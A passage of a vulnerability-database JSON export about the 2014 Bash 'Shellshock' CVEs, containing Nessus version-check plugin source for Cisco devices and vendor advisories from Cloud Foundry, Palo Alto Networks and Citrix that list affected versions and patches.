\"^7\\.0\\(3\\)N1\\(0\\.125\\)\" ||\n version =~ \"^7\\.0\\(4\\)N1\\(1\\)\" ||\n version =~ \"^7\\.1\\(0\\)N1\\(0\\.349\\)\"\n ) fixed = \"Contact Vendor\";\n}\n\n# Nexus 7000 fixed in 5.2(9a) / 6.1(5a) / 6.2(8b) / 6.2(10) and above\nif (device == 'Nexus' && model =~ \"^7[0-6][0-9][0-9]([^0-9]|$)\")\n{\n bug_ID = 'CSCuq98748';\n\n if (\n version =~ \"^4\\.\" ||\n version =~ \"^5\\.[01]\\(\" ||\n version =~ \"^5\\.2\\([0-9]\\)\"\n ) fixed = \"5.2(9a)\";\n\n if (\n version =~ \"^6\\.0\\(\" ||\n version =~ \"^6\\.1\\([0-4][Aa]?\\)\" ||\n version =~ \"^6\\.1\\(5\\)\"\n ) fixed = \"6.1(5a)\";\n\n if (\n version =~ \"^6\\.2\\([0-8][Aa]?\\)\"\n ) fixed = \"6.2(8b) / 6.2(10)\";\n}\n\n# Nexus 9000 known affected 6.1(2)I2(2b) / 7.2(0.1)VB(0.1)\n# Nexus 9000 ACI version prior to 11.0(1d) affected\nif (device == 'Nexus' && model =~ \"^9[0-6][0-9][0-9]([^0-9]|$)\")\n{\n if (\n version =~ \"^6\\.1\\(2\\)I2\\(2b\\)\" ||\n version =~ \"^7\\.2\\(0\\.1\\)VB\\(0\\.1\\)\"\n )\n {\n bug_ID = 'CSCur02700';\n fixed = \"6.1(2)I3(1)\";\n }\n\n if (\n version =~ \"^11\\.0\\(1[bc]\\)\"\n )\n {\n bug_ID = 'CSCur02102';\n fixed = \"11.0(1d)\";\n }\n}\n\nif (!empty(fixed) && !empty(bug_ID))\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Cisco bug ID : ' + bug_ID +\n '\\n Model : ' + device + ' ' + model +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T01:38:09", "description": "According to its self-reported version number, remote Cisco\nTelePresence Conductor device is affected by a command injection\nvulnerability in GNU Bash known as Shellshock. The vulnerability is\ndue to the processing of trailing strings after function definitions\nin the values of environment variables. This allows a remote attacker\nto execute arbitrary code via environment variable manipulation\ndepending on the configuration of the system.\n\nNote that an attacker must be authenticated before the device is\nexposed to this exploit.", "edition": 29, "published": "2014-11-26T00:00:00", "title": "Cisco TelePresence Conductor Bash Remote Code Execution (Shellshock)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:cisco:telepresence_conductor"], "id": "CISCO_TELEPRESENCE_CONDUCTOR_CSCUR02103.NASL", "href": "https://www.tenable.com/plugins/nessus/79584", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79584);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur02103\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20140926-bash\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"Cisco TelePresence Conductor Bash Remote Code Execution (Shellshock)\");\n script_summary(english:\"Checks the software version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Cisco TelePresence Conductor device is affected by a\ncommand injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, remote Cisco\nTelePresence Conductor device is affected by a command injection\nvulnerability in GNU Bash known as Shellshock. The vulnerability is\ndue to the processing of trailing strings after function definitions\nin the values of environment variables. This allows a remote attacker\nto execute arbitrary code via environment variable manipulation\ndepending on the configuration of the system.\n\nNote that an attacker must be authenticated before the device is\nexposed to this exploit.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCur02103\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df19d2c1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.3.1 / 2.4.1 / 3.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:telepresence_conductor\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_telepresence_conductor_detect.nbin\");\n script_require_keys(\"Host/Cisco_TelePresence_Conductor/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nprod = \"Cisco TelePresence Conductor\";\nversion = get_kb_item_or_exit(\"Host/Cisco_TelePresence_Conductor/Version\");\n\nif (\n version =~ \"^1(\\.|$)\" ||\n (version =~ \"^2\\.(0|1|2)(\\.|$)\") ||\n (version =~ \"^2\\.3(\\.|$)\" && ver_compare(ver:version, fix:\"2.3.1\", strict:FALSE) < 0) ||\n (version =~ \"^2\\.4(\\.|$)\" && ver_compare(ver:version, fix:\"2.4.1\", strict:FALSE) < 0)\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed versions : 2.3.1 / 2.4.1 / 3.0' +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, prod, version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T01:37:52", "description": "The remote ASA Next-Generation Firewall (NGFW) host is missing a\nsecurity patch. It is, therefore, affected by a command injection\nvulnerability in GNU Bash known as Shellshock. The vulnerability is\ndue to the processing of trailing strings after function definitions\nin the values of environment variables. This allows a remote attacker\nto execute arbitrary code via environment variable manipulation\ndepending on the configuration of the system.", "edition": 28, "published": "2014-11-03T00:00:00", "title": "Cisco ASA Next-Generation Firewall GNU Bash Environment Variable Handling Command Injection (cisco-sa-20140926-bash) (Shellshock)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/h:cisco:adaptive_security_appliance"], "id": "CISCO-SA-CSCUR01959-ASA-CX.NASL", "href": "https://www.tenable.com/plugins/nessus/78827", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78827);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur01959\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20140926-bash\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"Cisco ASA Next-Generation Firewall GNU Bash Environment Variable Handling Command Injection (cisco-sa-20140926-bash) (Shellshock)\");\n script_summary(english:\"Checks the ASA version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote security device is missing a vendor-supplied security\npatch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote ASA Next-Generation Firewall (NGFW) host is missing a\nsecurity patch. It is, therefore, affected by a command injection\nvulnerability in GNU Bash known as Shellshock. The vulnerability is\ndue to the processing of trailing strings after function definitions\nin the values of environment variables. This allows a remote attacker\nto execute arbitrary code via environment variable manipulation\ndepending on the configuration of the system.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df19d2c1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in Cisco Security Advisory\ncisco-sa-20140926-bash.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:adaptive_security_appliance\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Cisco/ASA-CX/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\n\nver = get_kb_item_or_exit('Host/Cisco/ASA-CX/Version');\nfix = '9.3.2.1(9)';\n\n# Versions 9.1.x, 9.2.x, and 9.3.x blow 9.3.2.1 (9) are vulnerable\nif (\n cisco_gen_ver_compare(a:ver, b:\"9.1.0\") >= 0 &&\n cisco_gen_ver_compare(a:ver, b:fix) < 0\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed release : ' + ver +\n '\\n Fixed release : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'ASA CX/NGFW', ver);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:46", "bulletinFamily": "software", "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "description": "CVE-2014-6271 and CVE-2014-7169 \u2013 ShellShock\n\n# \n\nImportant\n\n# Vendor\n\nCanonical Ubuntu, CentOS\n\n# Versions Affected\n\n * Canonical Ubuntu 10.04 LTS that include bash \n * CentOS 6.5 that include bash \n\n# Description\n\nGNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients and other situations in which setting the environment occurs across a privilege boundary from Bash execution.\n\nThe Cloud Foundry project is in the process of checking if Cloud Foundry are vulnerable to remote code execution or other exploits. No exploits have been identified or confirmed yet. The Cloud Foundry project is patching all components that have packaged the vulnerable version of bash.\n\n# Affected Products and Versions\n\n_Severity is important unless otherwise noted. \n_\n\n * All versions of Cloud Foundry BOSH stemcells prior to 2719.1 have bash executables vulnerable to CVE-2014-6271 \n * All versions of Cloud Foundry runtime prior to v186 have bash executables vulnerable to CVE-2014-6271 \n * All versions of Cloud Foundry BOSH stemcells prior to 2719.2 have bash executables vulnerable to CVE-2014-7169 \n * All versions of Cloud Foundry runtime v186 and prior have bash executables vulnerable to CVE-2014-7169 \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry project recommends that Cloud Foundry Runtime Deployments running Release v183 or earlier upgrade to v186 or later and BOSH stemcells 2719.1 or later, which contains the patched version of bash that resolves CVE-2014-6271. \n * The Cloud Foundry Project recommends that BOSH deployments running BOSH stemcells 2719.1 and prior upgrade to BOSH stemcell 2719.2 and higher which contains the patched version of bash that resolves CVE-2014-6271 and CVE-2014-7169. \n * The Cloud Foundry project recommends that Cloud Foundry Runtime Deployments running Release v186 and prior upgrade to Release v187 or later. \n\n# Credit\n\nStephane Chazelas (CVE-2014-6271) and Huzaifa S. Sidhpurwala (CVE-2014-7169)\n\n# References\n\n * <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271>\n * <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169>\n * <http://boshartifacts.cloudfoundry.org/file_collections?type=stemcells>\n * <https://github.com/cloudfoundry/cf-release>\n\n# History\n\n2014-Sep-25: Initial vulnerability report published.\n", "edition": 5, "modified": "2014-09-25T00:00:00", "published": "2014-09-25T00:00:00", "id": "CFOUNDRY:13948A26B0F4A736B03310A8560A6F73", "href": "https://www.cloudfoundry.org/blog/cve-2014-6271-and-cve-2014-7169/", "title": "CVE-2014-6271 and CVE-2014-7169 - ShellShock | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:45", "bulletinFamily": "software", "cvelist": ["CVE-2014-7187", "CVE-2014-7186"], "description": "CVE-2014-7186 and CVE-2014-7187 \u2013 Bash Out of Bounds\n\n# \n\nModerate\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 10.04 LTS and 14.04 LTS that include bash through 4.3 bash43-026 \n\n# Description\n\nOff-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the \u2018word_lineno\u2019 issue.\n\nThe redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the \u2018redir_stack\u2019 issue.\n\nThe Cloud Foundry project is unaware of vulnerable versions of bash potentially allowing a denial of service remotely. No exploits have been identified or confirmed yet.\n\n# Affected Products and Versions\n\n_Severity is moderate unless otherwise noted. \n_\n\n * All versions of Cloud Foundry BOSH stemcells prior to 2719.2 and prior have bash executables vulnerable to CVE-2014-7186 and CVE-2014-7187. \n * All versions of Cloud Foundry runtime v187 and prior have bash executables vulnerable to CVE-2014-7186 and CVE-2014-7187. \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry project recommends that Cloud Foundry Runtime Deployments running Release v187 or earlier upgrade to v188 or later and BOSH stemcells 2719.3 or later when they are available, which are planned to contain the patched version of bash that resolves CVE-2014-7186 and CVE-2014-7187. \n\n# Credit\n\nFlorian Weimer and Todd Sabin\n\n# References\n\n * <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186>\n * <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187>\n * <http://boshartifacts.cloudfoundry.org/file_collections?type=stemcells>\n * <https://github.com/cloudfoundry/cf-release>\n\n# History\n\n2014-Sep-29: Initial vulnerability report published.\n", "edition": 5, "modified": "2014-09-29T00:00:00", "published": "2014-09-29T00:00:00", "id": "CFOUNDRY:C46B0B3FC4C7E34D197F6DC7E602B255", "href": "https://www.cloudfoundry.org/blog/cve-2014-7186-and-cve-2014-7187/", "title": "CVE-2014-7186 and CVE-2014-7187 - Bash Out of Bounds | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "paloalto": [{"lastseen": "2019-05-29T23:19:21", "bulletinFamily": "software", "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "description": "Palo Alto Networks has become aware of a remote code execution vulnerability in the Bash shell utility. This vulnerability (CVE-2014-6271) allows for remote code execution through multiple vectors due to the way Bash is often used on linux systems for processing commands. Additional information can be found here: http://seclists.org/oss-sec/2014/q3/650 \n", "edition": 4, "modified": "2014-09-25T00:00:00", "published": "2014-09-24T00:00:00", "id": "PAN-SA-2014-0004", "href": "https://securityadvisories.paloaltonetworks.com/Home/Detail/24", "title": "Bash Shell remote code execution (CVE-2014-6271, CVE-2014-7169)", "type": "paloalto", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "citrix": [{"lastseen": "2020-11-18T15:29:37", "bulletinFamily": "software", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "<section class=\"article-content\" data-swapid=\"ArticleContent\">\n<div class=\"content-block\" data-swapid=\"ContentBlock\"><div>\n<div>\n<h2> Description of Problem</h2>\n<div>\n<div>\n<div>\n<p>Citrix is aware of recent vulnerability reports that impact GNU Bash and is actively investigating the potential impact of these issues on Citrix products. There are a number of CVEs related to this issue, the current set includes:</p>\n<ul>\n<li>CVE-2014-6271 </li>\n<li>CVE-2014-6277 </li>\n<li>CVE-2014-6278 </li>\n<li>CVE-2014-7169 </li>\n<li>CVE-2014-7186 </li>\n<li>CVE-2014-7187<br/> </li>\n</ul>\n<p>The following sections provide some initial guidance to customers on the potential impact of this issue. Please note that this issue is under active analysis and, as such, customers should check back frequently to get the current status of our response.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix XenApp & XenDesktop</h2>\n<div>\n<div>\n<div>\n<p>Most XenApp and XenDesktop components are Windows-based and, as such, are not affected by this vulnerability. Citrix recommends that customers review the following list for more information on specific components:</p>\n<ul>\n<li>Citrix XenDesktop Volume Worker Virtual Machines: Citrix recommends that customers ensure that the virtual machine being used to host the Volume Worker has been patched for this issue.</li>\n<li>Citrix Receivers for Linux, Mac and Android: In line with best practice, Citrix recommends that customers apply any necessary updates to client operating systems. </li>\n<li>Citrix Web Interface when deployed on Unix-based web servers: We recommend that customers verify that the underlying webserver is not vulnerable to this issue. </li>\n<li>Current versions of Citrix Web Interface when deployed on Windows platforms are not affected by this issue.</li>\n<li>Current versions of Citrix Secure Gateway running on Windows platforms are not affected by this issue.</li>\n<li>Citrix Licensing: Please refer to the Citrix Licensing section of this document.</li>\n<li>Citrix Merchandising Server: We are still in the process of investigating the potential impact of this issue on the Merchandising Server. This document will be updated when more information is available.</li>\n</ul>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix NetScaler ADC and NetScaler Gateway</h2>\n<div>\n<div>\n<div>\n<p>We are not currently aware of any direct risk from this issue to any remote NetScaler interfaces. As a defence in depth measure Citrix has included patches for these issues in NetScaler versions 10.5-52.11, 10.1-129.11 and 9.3-67.5.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix NetScaler SDX</h2>\n<div>\n<div>\n<div>\n<p>Citrix has released updates that address this issue on the NetScaler SDX. Customers are advised to upgrade to the following versions:</p>\n<ul>\n<li>10.5.52.11r1 or later</li>\n<li>10.1.129.11r1 or later</li>\n<li>9.3.67.5r1 or later</li>\n</ul>\n<div>\n These versions can be found on the Citrix website at the following address: \n <a href=\"https://www.citrix.com/downloads/netscaler-adc/service-delivery-appliances.html\">https://www.citrix.com/downloads/netscaler-adc/service-delivery-appliances.html</a>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix XenServer</h2>\n<div>\n<div>\n<div>\n<p>Citrix has released security bulletin CTX200223 to cover the impact of Shellshock on XenServer. It is available at the following location: </p>\n<p> <a href=\"https://support.citrix.com/article/CTX200223\">https://support.citrix.com/article/CTX200223</a>.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix XenClient Enterprise </h2>\n<div>\n<div>\n<div>\n<p>The following XenClient Enterprise engines are impacted by this issue when configured to use DHCP:</p>\n<ul>\n<li>All versions of XenClient Enterprise Engine version 4.x: A new version of XenClient Enterprise, 4.5.8, has been released to address this issue. This can be found at the following address:<br/> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-45.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-45.html</a></li>\n<li>All versions of XenClient Enterprise Engine version 5.x up to and including version 5.1.4: A new version of XenClient Enterprise, 5.1.5, has been released to address this issue. This can be found at the following address:<br/> h<a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-51.html\">ttps://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-51.html</a>.</li>\n</ul>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix Desktop Player for Mac</h2>\n<div>\n<div>\n<div>\n<p>We are not aware of any direct risk from this issue. In line with existing best practice, customers are advised ensure that any applicable security patches are applied to the underlying operating system.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix Synchronizer for XenClient Enterprise and Desktop Player for Mac</h2>\n<div>\n<div>\n<div>\n<p>We are not aware of any direct risk from this issue. In line with existing best practice, customers are advised to ensure that any applicable security patches are applied to the underlying operating system that is being used to host the synchronizer.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix XenMobile</h2>\n<div>\n<div>\n<div>\n<p>Analysis of the impact to XenMobile components is continuing. The following list contains our current guidance for XenMobile components:</p>\n<ul>\n<li>XenMobile Device Manager, XenMobile NetScaler Connector and XenMobile Mail Manager: On-premise versions of these products are not believed to be affected by this vulnerability.</li>\n<li>AppController: The on-premise version of AppController is not vulenrable to this issue. However, fixes have been released for this as a defence in depth measure. This patch is available on the Citrix website at the following address:<br/> <a href=\"https://support.citrix.com/article/CTX142031\">https://support.citrix.com/article/CTX142031<br/> </a></li>\n<li>Citrix recommends that customers using affected versions of App Controller apply this patch to their appliances as soon as their patching schedule allows. </li>\n<li>XenMobile Client for iOS and Android: These clients are not believed to be directly affected by this vulnerability. In line with best practice, Citrix recommends that customers apply any necessary updates to client operating systems.</li>\n<li>XenMobile Client for Windows Phone: This client is not believed to be affected.</li>\n<li>XenMobile Cloud: We do not currently believe that the cloud hosted versions of XenMobile Device Manager and AppController are vulnerable this issue. However, we are continuing to investigate and this guidance will be updated as our analysis continues.</li>\n</ul>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix ByteMobile</h2>\n<div>\n<div>\n<div>\n<p>Analysis of the impact to ByteMobile is continuing, the following list contains our current guidance for ByteMobile components:</p>\n<ul>\n<li>ByteMobile Adaptive Traffic Management: Current versions of the ATM component are vulnerable to this issue. Citrix will be releasing updated versions in the near future, details of the fixes will be added to this document as soon as they are available.</li>\n<li>ByteMobile Video Cache: Video Cache is vulnerable to this issue, details for remediation will be added to this document as soon as they are available.</li>\n<li>ByteMobile Traffic Director: We are not currently aware of any direct risk from this issue to the main data path for Traffic Director. Some risk may exist for management interfaces so, in line with existing best practice, we recommend that access to any Traffic Director management interfaces are constrained to trusted users and networks only.</li>\n<li>ByteMobile BEM, BRD, BDL, PPG: We recommend that all customers update their Linux OS to remediate the known issues.</li>\n</ul>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix CloudBridge and BranchRepeater</h2>\n<div>\n<div>\n</div>\n</div>\n</div>\n<div>\n<p>Branch Repeater VPX in Amazon Web Services (AWS) uses a DHCP client which is vulnerable to this issue. Citrix recommends that customers using Branch Repeater VPX in AWS ensure they are using best practices for securing their systems in Amazon Web Services. Citrix has released new virtual appliances that contain updates to address this issue in CloudBridge versions 7.3.1 and later and 7.2.3 and later. These new versions can be found at the following location:</p>\n<p> </p>\n<p> <a href=\"https://www.citrix.com/downloads/cloudbridge/virtual-appliances.html\">https://www.citrix.com/downloads/cloudbridge/virtual-appliances.html</a></p>\n<p>We are not currently aware of any direct risk from this issue to other CloudBridge endpoints. While we complete our research, we recommend that customers follow existing Citrix best practices for securing their CloudBridge devices including ensuring access to any CloudBridge management interfaces are constrained to trusted users and networks only. </p>\n</div>\n<div>\n<h2> Citrix SaaS Solutions</h2>\n<div>\n<div>\n<div>\n<p>Analysis of the impact to SaaS solutions is continuing. The following list contains our current guidance for SaaS solutions:</p>\n<ul>\n<li>GoToMeeting: GoToMeeting is not currently believed to be vulnerable to this issue. </li>\n<li>GoToTraining: GoToTraining is not currently believed to be vulnerable to this issue. </li>\n<li>GoToWebinar: GoToWebinar is not currently believed to be vulnerable to this issue. </li>\n<li>ShareFile: ShareFile is not currently believed to be vulnerable to this issue. </li>\n<li>GoToMyPC: GoToMyPC is not currently believed to be vulnerable to this issue. </li>\n<li>GoToAssist: GoToAssist is not currently believed to be vulnerable to this issue. </li>\n<li>OpenVoice: OpenVoice is not currently believed to be vulnerable to this issue. </li>\n<li>Citrix Labs Products (GoToMeet.me, GoToMeeting Free, Convoi, Talkboard, ShareConnect): Citrix Labs Products are not currently believed to be vulnerable to this issue.</li>\n</ul>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix CloudPlatform</h2>\n<div>\n<div>\n<div>\n<p>We are not currently aware of any direct risk from this issue to the CloudPlatform system virtual machines. As a defence in depth measure, Citrix has included patches for these issues in new versions of the system templates. These can be downloaded from the Citrix website at the following address:</p>\n<p> <a href=\"https://www.citrix.com/downloads/cloudplatform/product-software.html\">https://www.citrix.com/downloads/cloudplatform/product-software.html</a></p>\n<p>Additionally, customers are advised to update their management servers and guest virtual machines as well as any virtual machine snapshots, templates, or ISO files to a non-vulnerable version of bash. Citrix recommend that customers follow existing Citrix best practices for securing their CloudPlatform systems including ensuring access to any CloudPlatform management interfaces are constrained only to trusted users and networks.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> CloudPortal Business Manager</h2>\n<div>\n<div>\n<div>\n<p>We are not aware of any direct risk from this issue. In line with existing best practice, customers are advised ensure that any applicable security patches are applied to the underlying operating system.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix Licensing</h2>\n<div>\n<div>\n<div>\n<p>Citrix License Server VPX: VPX machines that are configured to use DHCP are impacted by this issue. The license server inside the VPX is not impacted because it does not use bash. A new version of the License Server VPX has been released to address this issue. This new version can be downloaded from the folowing address: Version 11.12.1: <a href=\"https://www.citrix.com/downloads/licensing/license-server.html\">https://www.citrix.com/downloads/licensing/license-server.html</a></p>\n<p>Customers that are not able to upgrade immediately can reconfigure the VPX to use a static IP address or implement network filtering to limit the risk of a malicious DHCP response being sent to the VPX. Citrix also recommends that network access to this VPX is restricted.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix Merchandising Server</h2>\n<div>\n<div>\n<div>\n<p>We are not aware of any direct risk posed to the Merchandising Server from this vulnerability. This guide will be updated if further information becomes available.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix VDI-In-A-Box</h2>\n<div>\n<div>\n<div>\n<p>The following versions of Citrix VDI-In-A-Box (VIAB) are impacted by this vulnerability:</p>\n<p>Citrix VDI-In-A-Box 